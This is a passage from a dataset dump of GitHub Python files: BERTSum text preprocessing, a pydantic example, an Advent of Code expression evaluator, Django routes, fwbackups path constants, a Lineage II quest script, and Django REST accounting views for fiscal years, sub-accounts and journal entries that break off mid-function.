len(tok_e))\n #assert(len(tok_s) == len(sents))\n \n if sentences is not None: # select starts and ends for specific sentences\n tok_ss = []\n tok_ee = []\n sents = sentences\n start_sel = [text.index(s) for s in sents]\n for s in start_sel:\n for i, t in enumerate(encoded.tokens()):\n ids = encoded.token_to_chars(i)\n if ids == None:\n continue\n ss = ids.start\n ee = ids.end\n if ss == s:\n tok_ss.append(i)\n tok_ee = [tok_e[tok_s.index(s)] for s in tok_ss]\n tok_s = tok_ss\n tok_e = tok_ee\n assert(len(tok_s) == len(tok_e))\n assert(len([x for x in tok_s if x > 512]) == 0)\n assert(len([x for x in tok_e if x > 512]) == 0)\n return sents, tok_s, tok_e\n\ndef truncate_doc(text, tokenizer):\n text_sent, tok_s, tok_e = get_sentence_token_ids(text, tokenizer)\n\n # get sentences up to 512 token length\n valid = []\n for i, e in enumerate(tok_e):\n if e <= 512:\n valid.append(i)\n text_sent = [text_sent[i] for i in valid]\n return ' '.join(text_sent), text_sent\n\nif __name__ == '__main__':\n fnames = [\n 'easy-ans-samples-cnndm.pkl',\n 'hard-ans-samples-cnndm.pkl',\n ]\n\n model_name = \"sshleifer/distilbart-cnn-12-6\"\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n \n for fname in fnames:\n print('-- processing file: {}'.format(fname))\n output_dir = os.path.join('..', fname.split('.')[0])\n print('---> saving output in : {}'.format(output_dir))\n \n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n text_info = pickle.load(open(fname, 'rb'))\n idx = list(text_info.keys())\n for i in idx:\n s0 = text_info[i]['original_text']\n s1 = text_info[i]['wrong_text'][0]\n s2 = text_info[i]['wrong_text'][1]\n \n # truncate document to match the max token length\n s0, s0_sents = truncate_doc(s0, tokenizer)\n s1, s1_sents = truncate_doc(s1, tokenizer)\n s2, s2_sents = truncate_doc(s2, tokenizer)\n\n ## preprocess for BERTSum input format\n\n # split into sentences with specific format required by the method\n # sentence split by specific tokens\n par = lambda s : ' [CLS] [SEP] '.join(s)\n s0 = par(s0_sents)\n s1 = par(s1_sents)\n s2 = par(s2_sents)\n\n # write each document a a file (labeled with 0-2)\n ff = 'sample-%d_0.txt'%i\n with open(os.path.join(output_dir, ff), 'w') as f:\n f.write(s0)\n ff = 'sample-%d_1.txt'%i\n with open(os.path.join(output_dir, ff), 'w') as f:\n f.write(s1)\n ff = 'sample-%d_2.txt'%i\n with open(os.path.join(output_dir, ff), 'w') as f:\n f.write(s2)\n","repo_name":"wnstlr/document-matching","sub_path":"bertsum_scripts/get_samples_bertsum.py","file_name":"get_samples_bertsum.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21832175775","text":"from pydantic import BaseModel\n\nclass Person(BaseModel):\n first: str\n last: str\n zip_code: str\n \n \n def __str__(self) -> str:\n return \"%s %s: %s\" % (self.first, self.last, self.zip_code)\n \nperson_dict = {\n \"first\": \"Bruce\",\n \"last\": \"wayne\",\n \"zip_code\": \"10021\"\n} \n \nperson = Person(**person_dict)\n\n \nprint(person)","repo_name":"Awodi-Emmanuel/Fastapi","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71484330727","text":"import os\nfrom typing import List, Generator\n\ndef parse_input(file_name: str) -> List[str]:\n with open(file_name) as f:\n return [line.strip().replace(' ', '') for line in f.readlines()]\n\ndef 
problem_iterator(problem: str) -> Generator[str, None, None]:\n for letter in list(problem):\n yield letter\n\ndef calculate_problem(problem: str) -> int:\n def _helper(p_it: Generator[str, None, None]) -> int:\n lhs = next(p_it)\n if lhs == ')':\n lhs = _helper(p_it)\n else:\n lhs = int(lhs)\n\n try:\n op = next(p_it)\n if op == '(':\n return lhs\n rhs = _helper(p_it)\n return eval(f'{lhs}{op}{rhs}')\n except:\n return lhs\n\n it = problem_iterator(problem[::-1])\n return _helper(it)\n\ndef calculate_answer(problems: List[str]) -> int:\n return sum([calculate_problem(p) for p in problems])\n\nif __name__ == '__main__':\n dir_path = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(dir_path, 'input.txt')\n problems = parse_input(file_path)\n answer = calculate_answer(problems)\n print(answer)","repo_name":"nagybalint/advent-of-code-2020","sub_path":"day_18/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4189993807","text":"from chat.views import GroupGeneral, GroupInterns, WebSocketGeneral, WebSocketInterns\nfrom auth.views import Login\n\nroutes = [\n\t('GET', '/', GroupGeneral, 'general'),\n\t('GET', '/interns', GroupInterns, 'interns'),\n\t('GET', '/wsgeneral', WebSocketGeneral, 'wsgeneral'),\n\t('GET', '/wsinterns', WebSocketInterns, 'wsinterns'),\n\t('GET', '/login', Login, 'login')\n]","repo_name":"temirrr/AsyncIO-Message-App","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29933291009","text":"import os\nimport sys\nimport getpass\nimport pathlib\nfrom enum import Enum, auto\n\nMSWINDOWS = sys.platform.startswith('win')\nLINUX = sys.platform.startswith('linux')\nDARWIN = sys.platform == 'darwin'\nIS_FLATPAK = os.path.exists('/.flatpak-info')\n\nif MSWINDOWS:\n UID = 1\n ROOTDRIVE = os.path.splitdrive(sys.argv[0])[0]\nelse:\n UID = os.getuid()\n\ntry:\n USER = getpass.getuser()\nexcept ImportError:\n USER = False\n\n# Paths\nINSTALL_DIR = os.path.abspath(os.path.dirname(__file__))\nUSERHOME = pathlib.Path.home()\n\nLOC = USERHOME.joinpath('.fwbackups') # The fwbackups configuration directory\nSETLOC = LOC.joinpath('Sets') # The location to store set configuration files\nONETIMELOC = LOC.joinpath('fwbackups-OneTime.conf') # The location to store the one-time backup configuration file\nPREFSLOC = LOC.joinpath('fwbackups-prefs.conf') # The location of the preferences file\nRESTORELOC = LOC.joinpath('fwbackups-Restore.conf') # The location to store the restore configuration file\nLOGLOC = LOC.joinpath('fwbackups-userlog.txt') # The location to store the log file\n\ntry: # because Windows doesn't do exit codes properly...\n EXIT_STATUS_OK = os.EX_OK\nexcept AttributeError: # ... 
we need this thing.\n EXIT_STATUS_OK = 0\n\nCRON_SIGNATURE = \"# autogenerated by fwbackups\"\n\n\nclass EventType(Enum):\n BACKUP_STARTED = auto()\n BACKUP_COMPLETE = auto()\n BACKUP_ERROR = auto()\n BACKUP_CANCELLED = auto()\n RESTORE_STARTED = auto()\n RESTORE_COMPLETE = auto()\n RESTORE_ERROR = auto()\n RESTORE_CANCELLED = auto()\n\n\ndef ConvertPath(path):\n \"\"\"Makes a path portable.\"\"\"\n if MSWINDOWS and path[1:3] != ':\\\\':\n path = '%s\\\\%s' % (ROOTDRIVE, path)\n return os.path.normpath(path)\n","repo_name":"stewartadam/fwbackups","sub_path":"fwbackups/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"53"} +{"seq_id":"36416723670","text":"# Made by Kerberos v1.0 on 2009/05/10\n# this script is part of the Official L2J Datapack Project.\n\nimport sys\nimport time\n\nfrom com.it.br.gameserver.ai import CtrlIntention\nfrom com.it.br.gameserver.model.quest\t\t\timport State\nfrom com.it.br.gameserver.model.quest\t\t\timport QuestState\nfrom com.it.br.gameserver.model.quest.jython\t\timport QuestJython as JQuest\nfrom com.it.br.gameserver.network.serverpackets import NpcSay\n\nqn = \"25_HidingBehindTheTruth\"\n\n# Npcs\nAgripel = 31348\nBenedict = 31349\nWizard = 31522\nTombstone = 31531\nLidia = 31532\nBookshelf = 31533\nBookshelf2 = 31534\nBookshelf3 = 31535\nCoffin = 31536\nTriol = 27218\n\n# Items\nContract = 7066\nDress = 7155\nSuspiciousTotem = 7156\nGemstoneKey = 7157\nTotemDoll = 7158\n\nclass Quest (JQuest) :\n def __init__(self,id,name,descr):\n JQuest.__init__(self,id,name,descr)\n self.questItemIds = [SuspiciousTotem,GemstoneKey,TotemDoll,Dress]\n\n\n def onAdvEvent (self,event,npc, player) :\n st = player.getQuestState(qn)\n if not st: return\n htmltext = event\n if event == \"31349-02.htm\" :\n st.playSound(\"ItemSound.quest_accept\")\n st.set(\"cond\",\"1\")\n st.setState(State.STARTED)\n elif event == \"31349-03.htm\" :\n if st.getQuestItemsCount(SuspiciousTotem) :\n htmltext = \"31349-05.htm\"\n else :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"2\")\n elif event == \"31349-10.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"4\")\n elif event == \"31348-02.htm\" :\n st.takeItems(SuspiciousTotem,-1)\n elif event == \"31348-07.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"5\")\n st.giveItems(GemstoneKey,1)\n elif event == \"31522-04.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"6\")\n elif event == \"31535-03.htm\" :\n if st.getInt(\"step\") == 0:\n st.set(\"step\",\"1\")\n triol = st.addSpawn(Triol,59712,-47568,-2712,0,0,300000,1)\n time.sleep(1)\n triol.broadcastPacket(NpcSay(triol.getObjectId(), 0, triol.getNpcId(), \"That box was sealed by my master. 
Don't touch it!\"))\n triol.setRunning()\n triol.addDamageHate(player,0,999)\n triol.getAI().setIntention(CtrlIntention.AI_INTENTION_ATTACK, player)\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"7\")\n elif st.getInt(\"step\") == 2:\n htmltext = \"31535-04.htm\"\n elif event == \"31535-05.htm\" :\n st.giveItems(Contract,1)\n st.takeItems(GemstoneKey,-1)\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"9\")\n elif event == \"31532-02.htm\" :\n st.takeItems(Contract,-1)\n elif event == \"31532-06.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"11\")\n elif event == \"31531-02.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"12\")\n st.addSpawn(Coffin,60104,-35820,-664,0,0,20000,1)\n elif event == \"31532-18.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"15\")\n elif event == \"31522-12.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"16\")\n elif event == \"31348-10.htm\" :\n st.takeItems(TotemDoll,-1)\n elif event == \"31348-15.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"17\")\n elif event == \"31348-16.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"18\")\n elif event == \"31532-20.htm\" :\n st.giveItems(905,2)\n st.giveItems(874,1)\n st.takeItems(7063,-1)\n st.addExpAndSp(572277,53750)\n st.unset(\"cond\")\n st.exitQuest(False)\n st.playSound(\"ItemSound.quest_finish\")\n elif event == \"31522-15.htm\" :\n st.giveItems(936,1)\n st.giveItems(874,1)\n st.takeItems(7063,-1)\n st.addExpAndSp(572277,53750)\n st.unset(\"cond\")\n st.exitQuest(False)\n st.playSound(\"ItemSound.quest_finish\")\n return htmltext\n\n\n def onTalk (self,npc,player):\n htmltext = \"You are either not on a quest that involves this NPC, or you don't meet this NPC's minimum quest requirements.\"\n st = player.getQuestState(qn)\n if not st : return htmltext\n npcId = npc.getNpcId()\n id = st.getState()\n cond = st.getInt(\"cond\")\n if id == State.COMPLETED:\n htmltext = \"This quest has already been completed.\"\n elif id == State.CREATED:\n if npcId == Benedict:\n st2 = st.getPlayer().getQuestState(\"24_InhabitantsOfTheForrestOfTheDead\")\n if st2 and st2.getState() == State.COMPLETED and player.getLevel() >= 66 :\n htmltext = \"31349-01.htm\"\n else :\n htmltext = \"31349-00.htm\"\n elif id == State.STARTED:\n if npcId == Benedict:\n if cond == 1 :\n htmltext = \"31349-02.htm\"\n elif cond in [2,3] :\n htmltext = \"31349-04.htm\"\n elif cond == 4 :\n htmltext = \"31349-10.htm\"\n elif npcId == Wizard:\n if cond == 2 :\n htmltext = \"31522-01.htm\"\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"3\")\n st.giveItems(SuspiciousTotem,1)\n elif cond == 3 :\n htmltext = \"31522-02.htm\"\n elif cond == 5 :\n htmltext = \"31522-03.htm\"\n elif cond == 6 :\n htmltext = \"31522-04.htm\"\n elif cond == 9 :\n htmltext = \"31522-05.htm\"\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"10\")\n elif cond == 10 :\n htmltext = \"31522-05.htm\"\n elif cond == 15 :\n htmltext = \"31522-06.htm\"\n elif cond == 16 :\n htmltext = \"31522-13.htm\"\n elif cond == 17 :\n htmltext = \"31522-16.htm\"\n elif cond == 18 :\n htmltext = \"31522-14.htm\"\n elif npcId == Agripel:\n if cond == 4 :\n htmltext = \"31348-01.htm\"\n elif cond == 5 :\n htmltext = \"31348-08.htm\"\n elif cond == 16 :\n htmltext = \"31348-09.htm\"\n elif cond == 17 :\n htmltext = \"31348-17.htm\"\n elif cond == 18 :\n htmltext = \"31348-18.htm\"\n elif npcId == Bookshelf:\n if 
cond == 6 :\n htmltext = \"31533-01.htm\"\n elif npcId == Bookshelf2:\n if cond == 6 :\n htmltext = \"31534-01.htm\"\n elif npcId == Bookshelf3:\n if cond in [6,7,8] :\n htmltext = \"31535-01.htm\"\n elif cond == 9 :\n htmltext = \"31535-06.htm\"\n elif npcId == Lidia:\n if cond == 10 :\n htmltext = \"31532-01.htm\"\n elif cond in [11,12] :\n htmltext = \"31532-06.htm\"\n elif cond == 13 :\n htmltext = \"31532-07.htm\"\n st.set(\"cond\",\"14\")\n st.takeItems(Dress,-1)\n elif cond == 14 :\n htmltext = \"31532-08.htm\"\n elif cond == 15 :\n htmltext = \"31532-18.htm\"\n elif cond == 17 :\n htmltext = \"31532-19.htm\"\n elif cond == 18 :\n htmltext = \"31532-21.htm\"\n elif npcId == Tombstone:\n if cond in [11,12] :\n htmltext = \"31531-01.htm\"\n elif cond == 13 :\n htmltext = \"31531-03.htm\"\n elif npcId == Coffin:\n if cond == 12 :\n htmltext = \"31536-01.htm\"\n st.giveItems(Dress,1)\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"13\")\n npc.deleteMe()\n return htmltext\n\n def onKill(self,npc,player,isPet):\n st = player.getQuestState(qn)\n if not st : return\n if st.getState() != State.STARTED : return\n if st.getInt(\"cond\") == 7:\n st.playSound(\"ItemSound.quest_itemget\")\n st.set(\"cond\",\"8\")\n npc.broadcastPacket(NpcSay(npc.getObjectId(), 0, npc.getNpcId(), \"You've ended my immortal life! You've protected by the feudal lord, aren't you?\"))\n st.giveItems(TotemDoll,1)\n st.set(\"step\",\"2\")\n return\n\nQUEST = Quest(25,qn,\"Hiding Behind The Truth\")\n\nQUEST.addStartNpc(Benedict)\nQUEST.addTalkId(Agripel)\nQUEST.addTalkId(Benedict)\nQUEST.addTalkId(Bookshelf)\nQUEST.addTalkId(Bookshelf2)\nQUEST.addTalkId(Bookshelf3)\nQUEST.addTalkId(Wizard)\nQUEST.addTalkId(Lidia)\nQUEST.addTalkId(Tombstone)\nQUEST.addTalkId(Coffin)\nQUEST.addKillId(Triol)","repo_name":"L2jBrasil/L2jBrasil","sub_path":"L2JBrasil_DP/data/jscript/quests/25_HidingBehindTheTruth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9514,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"26378009513","text":"from django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom django.http import JsonResponse\nfrom django.db.models.expressions import RawSQL\nfrom django.db.models import Count, Sum, Q\nfrom django.db import transaction\n\nfrom rest_framework import generics, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\nfrom .models import (\n AccountState, AccountingSettings, AccountsJournals, FiscalYear, AccountType,\n SubAccount, IncreaseState, DraftBudgetPlan, BudgetPlan)\nfrom .serializers import (\n FiscalYearSerializer, DraftBudgetPlanSerializer, SubAccountSerializer, AccounTypeSerializer,\n AccountingSettingsSerializer, AccountsJournalsSerializers,\n DraftBudgetPlan, BudgetPlanSerializer)\n\n\nclass FiscalYearCreateListView(APIView):\n def get(self, request, id=None):\n if id:\n fiscal_year = get_object_or_404(FiscalYear, id=id)\n serializer = FiscalYearSerializer(fiscal_year)\n\n return Response(\n serializer.data)\n else:\n fiscal_years = FiscalYear.objects.all()\n serializer = FiscalYearSerializer(fiscal_years, many=True)\n\n return Response(serializer.data)\n\n def post(self, request):\n data = request.data\n\n serializer = FiscalYearSerializer(data=data)\n\n open_fiscal_year = FiscalYear.objects.filter(\n state=AccountState.choices[0][0]).first()\n\n if open_fiscal_year:\n return Response(\n data=\"Cannot create new fiscal 
year when there is an existing open fiscal year\",\n status=status.HTTP_400_BAD_REQUEST)\n\n elif serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass CurrentFiscalYearView(APIView):\n def get(self, request):\n current_fiscal_year = FiscalYear.objects.filter(\n state=AccountState.choices[0][0]).all()\n\n if len(current_fiscal_year) == 1:\n serializer = FiscalYearSerializer(current_fiscal_year[0])\n\n return Response(serializer.data)\n elif len(current_fiscal_year) > 1:\n return Response(\n data=\"System error, Please contact the administrator\",\n status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response(\n data=\"Current Fiscal year not set\",\n status=status.HTTP_404_NOT_FOUND)\n\n\nclass StartupAccountsView(APIView):\n def post(self, request):\n \"\"\"\n data structure \\n\n {\n selling_products: {\n value: True,\n cash_sales: {\n value: True\n },\n credit_sales: {\n value: True\n },\n check_sales: {\n value: True\n },\n other_cash_accounts: {\n value: [\n {\n name: '',\n additional_data: ''\n }\n ]\n }\n },\n making_payments: {\n value: True,\n cash_payments: {\n value: True\n },\n credit_payments: {\n value: True\n },\n check_payments: {\n value: True\n },\n other_cash_accounts: {\n value: [\n {\n name: '',\n additional_data: {}\n }\n ]\n }\n },\n\n } \n \"\"\"\n accounts = {}\n # default revenue account\n\n current_fiscal_year = FiscalYear.objects.get(\n state=AccountState.choices[0][0])\n\n revenue_account_type = AccountType.objects.get(\n name__startswith=\"Revenue\",\n state=AccountState.choices[0][0])\n asset_account_type = AccountType.objects.get(\n name__startswith=\"Assets\",\n state=AccountState.choices[0][0])\n expense_account_type = AccountType.objects.get(\n name__startswith=\"Expenses\",\n state=AccountState.choices[0][0])\n liabilities_account_type = AccountType.objects.get(\n name__startswith=\"Expenses\",\n state=AccountState.choices[0][0])\n\n revenue_subaccount = SubAccount.objects.get(\n name__startswith=\"Revenue\",\n state=AccountState.choices[0][0])\n\n if not revenue_account_type:\n revenue_account_type = AccountType.objects.create(\n name=\"Revenue\",\n increase=IncreaseState.choices[1][0])\n current_fiscal_year.account_types.add(revenue_account_type)\n current_fiscal_year.save()\n\n if not revenue_subaccount:\n revenue_subaccount = SubAccount(name=\"Revenue Account\")\n revenue_subaccount.account_type.add(revenue_account_type)\n revenue_subaccount.save()\n\n selling_products = accounts[\"selling_products\"]\n if selling_products.value:\n if not asset_account_type:\n asset_account_type = AccountType.objects.create(\n name=\"Assets\",\n increase=IncreaseState.choices[0][0])\n current_fiscal_year.account_types.add(asset_account_type)\n current_fiscal_year.save()\n asset_account_type.save()\n\n if not expense_account_type:\n expense_account_type = AccountType.objects.create(\n name=\"Expenses\",\n increase=IncreaseState.choices[0][0])\n current_fiscal_year.account_types.add(expense_account_type)\n current_fiscal_year.save()\n expense_account_type.save()\n\n product_sales_subaccount = SubAccount.objects.get(\n name__startswith=\"Product Sales\",\n state=AccountState.choices[0][0])\n if not product_sales_subaccount:\n product_sales_subaccount = SubAccount(\n name=\"Product Sales Account\")\n product_sales_subaccount.account_type.add(revenue_account_type)\n product_sales_subaccount.save()\n\n 
inventory_subaccount = SubAccount.objects.get(\n name__startswith=\"Inventory\",\n state=AccountState.choices[0][0])\n if not inventory_subaccount:\n inventory_subaccount = SubAccount(name=\"Inventory Account\")\n inventory_subaccount.account_type.add(asset_account_type)\n inventory_subaccount.save()\n\n cogs_subaccount = SubAccount.objects.get(\n name__startswith=\"Cost of Goods Sold\",\n state=AccountState.choices[0][0])\n if not cogs_subaccount:\n cogs_subaccount = SubAccount(name=\"Cost of Goods Sold Account\")\n cogs_subaccount.account_type.add(expense_account_type)\n cogs_subaccount.save()\n\n if selling_products.cash_sales.value:\n cash_subaccount = SubAccount.objects.get(\n name__startswith=\"Cash\",\n state=AccountState.choices[0][0])\n if not cash_subaccount:\n cash_subaccount = SubAccount(name=\"Cash Account\")\n cash_subaccount.account_type.add(asset_account_type)\n cash_subaccount.save()\n\n if selling_products.credit_sales.value:\n credit_sales_subaccount = SubAccount.objects.get(\n name__startswith=\"Accounts Receivable\",\n state=AccountState.choices[0][0])\n if not credit_sales_subaccount:\n credit_sales_subaccount = SubAccount(\n name=\"Inventory Account\")\n credit_sales_subaccount.account_type.add(\n asset_account_type)\n credit_sales_subaccount.save()\n\n if selling_products.check_sales.value:\n check_subaccount = SubAccount.objects.get(\n name__startswith=\"Checking Account\",\n state=AccountState.choices[0][0])\n if not check_subaccount:\n check_subaccount = SubAccount(name=\"Checking Account\")\n check_subaccount.account_type.add(asset_account_type)\n check_subaccount.save()\n\n if selling_products.other_cash_accounts.value:\n for account in selling_products.other_cash_accounts.value:\n cash_m_subaccount = SubAccount.objects.get(\n name__startswith=account.name,\n state=AccountState.choices[0][0])\n if not cash_m_subaccount:\n cash_m_subaccount = SubAccount(\n name=account.name.capitalize(),\n additional_data=account.additional_data)\n cash_m_subaccount.account_type.add(asset_account_type)\n cash_m_subaccount.save()\n\n making_payments = accounts[\"making_payments\"]\n if making_payments.value:\n if not asset_account_type:\n asset_account_type = AccountType.objects.create(\n name=\"Assets\",\n increase=IncreaseState.choices[0][0])\n current_fiscal_year.account_types.add(asset_account_type)\n current_fiscal_year.save()\n asset_account_type.save()\n\n if making_payments.credit_payments.value:\n if not liabilities_account_type:\n liabilities_account_type = AccountType.objects.create(\n name=\"Liabilities\",\n increase=IncreaseState.choices[1][0])\n current_fiscal_year.account_types.add(\n liabilities_account_type)\n current_fiscal_year.save()\n liabilities_account_type.save()\n credit_payments_subaccount = SubAccount.objects.get(\n name__startswith=\"Accounts Payable\",\n state=AccountState.choices[0][0])\n if not credit_payments_subaccount:\n credit_payments_subaccount = SubAccount(\n name=\"Accounts Payable\")\n credit_payments_subaccount.account_type.add(\n liabilities_account_type)\n credit_payments_subaccount.save()\n\n if making_payments.cash_payments.value:\n cash_subaccount = SubAccount.objects.get(\n name__startswith=\"Cash\",\n state=AccountState.choices[0][0])\n if not cash_subaccount:\n cash_subaccount = SubAccount(name=\"Cash Account\")\n cash_subaccount.account_type.add(asset_account_type)\n cash_subaccount.save()\n\n if making_payments.check_payments.value:\n check_subaccount = SubAccount.objects.get(\n name__startswith=\"Checking Account\",\n 
state=AccountState.choices[0][0])\n if not check_subaccount:\n check_subaccount = SubAccount(name=\"Checking Account\")\n check_subaccount.account_type.add(asset_account_type)\n check_subaccount.save()\n\n if making_payments.other_cash_accounts.value:\n for account in selling_products.other_cash_accounts.value:\n payment_m_subaccount = SubAccount.objects.get(\n name__startswith=account.name,\n state=AccountState.choices[0][0])\n if not payment_m_subaccount:\n payment_m_subaccount = SubAccount(\n name=account.name.capitalize(),\n additional_data=account.additional_data)\n payment_m_subaccount.account_type.add(\n asset_account_type)\n payment_m_subaccount.save()\n\n return\n\n\nclass SubAccountsByIdsListView(APIView):\n def post(self, request):\n data = request.data\n\n accounts_ids = data.get(\"accounts_ids\")\n\n accounts = []\n\n for id in accounts_ids:\n accounts.append(SubAccount.objects.get(id=id))\n\n serializer = SubAccountSerializer(accounts, many=True)\n\n return Response(serializer.data)\n\n\nclass SubAccountsListCreateView(APIView):\n def get(self, request):\n data = request.query_params\n id = data.get(\"id\")\n name = data.get(\"name\")\n\n if id:\n sub_account = get_object_or_404(SubAccount, id=id)\n\n serializer = SubAccountSerializer(sub_account)\n\n elif name:\n sub_account = get_object_or_404(\n SubAccount, name__contains=name, state=AccountState.choices[0][0])\n\n serializer = SubAccountSerializer(sub_account)\n else:\n sub_accounts = SubAccount.objects.filter(\n state=AccountState.choices[0][0]).all()\n\n serializer = SubAccountSerializer(sub_accounts, many=True)\n\n return Response(serializer.data)\n\n def post(self, request, id):\n data = request.data\n\n sub_account = data.get(\"sub_account\")\n\n sub_accounts = data.get(\"sub_accounts\")\n\n account_type = get_object_or_404(AccountType, id=id)\n\n if sub_accounts:\n for sub_account__ in sub_accounts:\n serializer = SubAccountSerializer(data=sub_account__)\n\n if serializer.is_valid():\n sub_account = SubAccount.objects.create(**serializer.data)\n sub_account.account_type.add(account_type)\n sub_account.save()\n\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n return Response(\n data=\"New accounts have been created successfully\",\n status=status.HTTP_201_CREATED)\n\n elif sub_account:\n serializer = SubAccountSerializer(data=sub_account)\n\n if serializer.is_valid():\n sub_account = SubAccount.objects.create(**serializer.data)\n sub_account.account_type.add(account_type)\n sub_account.save()\n serializer = SubAccountSerializer(sub_account)\n\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response(\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AccountTypesListCreateView(APIView):\n def get(self, request, id=None):\n if id:\n account_type = AccountType.objects.get(id=id)\n\n serializer = AccounTypeSerializer(account_type)\n\n else:\n account_types = AccountType.objects.filter(\n state=AccountState.choices[0][0]).all()\n\n serializer = AccounTypeSerializer(account_types, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n data = request.data\n\n serializer = AccounTypeSerializer(data=data)\n\n if serializer.is_valid():\n account_type = serializer.save()\n\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n 
status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AccountingSettingsRetrieveCreateView(APIView):\n def get(self, request, item=None):\n if item:\n settings = get_object_or_404(AccountingSettings, item=item)\n\n serializer = AccountingSettingsSerializer(settings)\n else:\n settings = AccountingSettings.objects.all()\n serializer = AccountingSettingsSerializer(settings, many=True)\n\n return Response(data=serializer.data)\n\n def post(self, request):\n data = request.data[\"data\"]\n\n serializer = AccountingSettingsSerializer(data=data, many=True)\n if serializer.is_valid():\n for setting in serializer.data:\n existing_setting = AccountingSettings.objects.filter(\n item=setting[\"item\"]).first()\n if existing_setting:\n existing_setting.additional_data = setting[\"additional_data\"]\n existing_setting.save()\n else:\n new_setting = AccountingSettings.objects.create(\n item=setting[\"item\"])\n new_setting.additional_data = setting[\"additional_data\"]\n new_setting.save()\n\n serializer = AccountingSettingsSerializer(\n AccountingSettings.objects.all(), many=True)\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AccountsJounrnalsCreateListView(APIView):\n def get(self, request, id=None, entry_type=None):\n if id and entry_type:\n\n journal_entries = AccountsJournals.objects.filter(\n sub_account__id=id,\n entry_type=entry_type).all()\n\n serializer = AccountsJournalsSerializers(\n journal_entries, many=True)\n data = serializer.data\n\n elif id:\n sub_account = get_object_or_404(\n SubAccount,\n id=id)\n\n journal_entries = sub_account.accountsjournals_set.all()\n\n serializer = AccountsJournalsSerializers(\n journal_entries, many=True)\n data = serializer.data\n else:\n subaccounts = SubAccount.objects.filter(\n state=AccountState.choices[0][0]).all()\n data = []\n for subaccount in subaccounts:\n data.append(\n {\n \"account\": SubAccountSerializer(subaccount).data,\n \"journals\": AccountsJournalsSerializers(\n subaccount.accountsjournals_set.all(),\n many=True).data})\n\n return Response(data)\n\n @transaction.atomic(durable=True)\n def post(self, request, id):\n data = request.data\n\n subaccount = get_object_or_404(SubAccount, id=id)\n\n serializer = AccountsJournalsSerializers(data=data)\n\n if serializer.is_valid():\n if subaccount.account_type.all()[0].increase == data[\"entry_type\"]:\n amount = data[\"amount\"]\n else:\n amount = 0 - data[\"amount\"]\n \n new_entry = AccountsJournals.objects.create(\n date=data[\"date\"],\n amount=amount,\n item_id=data[\"budgetitem\"],\n entry_type=data[\"entry_type\"],\n additional_data=data[\"additional_data\"])\n\n new_entry.sub_account.add(subaccount)\n\n budget_settings = AccountingSettings.objects.get(\n item=\"ITEMS_SPECIFICATION\")\n if budget_settings.additional_data and \\\n budget_settings.additional_data[\"use_budget_plan\"] and \\\n budget_settings.additional_data[\"use_budget_plan\"][\"value\"]:\n\n budget_item = get_object_or_404(\n BudgetPlan, id=data[\"budgetitem\"])\n\n budget_subaccount = get_object_or_404(\n SubAccount,\n name=\"Budget_Item_%s_%s\" % (budget_item.identifier, budget_item.name))\n\n \n new_entry2 = AccountsJournals.objects.create(\n amount=amount,\n item_id=data[\"budgetitem\"],\n entry_type=budget_subaccount.account_type.all()[0].increase)\n\n new_entry2.sub_account.add(budget_subaccount)\n\n new_entry2.save()\n\n new_entry.save()\n\n return Response(\n data=\"Added entry 
